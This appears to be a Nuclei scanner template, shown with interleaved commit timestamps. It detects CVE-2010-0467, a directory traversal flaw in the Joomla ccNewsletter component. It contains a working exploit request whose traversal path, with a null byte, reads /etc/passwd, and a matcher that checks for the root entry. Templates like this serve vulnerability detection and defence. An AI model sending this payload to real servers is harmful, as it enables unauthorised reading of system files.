2021-09-27 11:02:48 +00:00
id : CVE-2010-0467
2022-04-22 10:38:41 +00:00
2021-09-27 11:02:48 +00:00
info :
name : Joomla! Component CCNewsLetter - Local File Inclusion
author : daffainfo
2021-09-27 13:08:18 +00:00
severity : medium
2022-02-13 19:00:17 +00:00
description : A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
2022-04-22 10:38:41 +00:00
reference :
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
2021-09-27 13:08:18 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.8
2021-09-27 13:08:18 +00:00
cve-id : CVE-2010-0467
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
remediation : Apply all relevant security patches and upgrades.
tags : cve,cve2010,joomla,lfi
2021-09-27 11:02:48 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-09-27 11:02:48 +00:00
- type : status
status :
2022-02-13 18:29:25 +00:00
- 200
# Enhanced by mp on 2022/02/13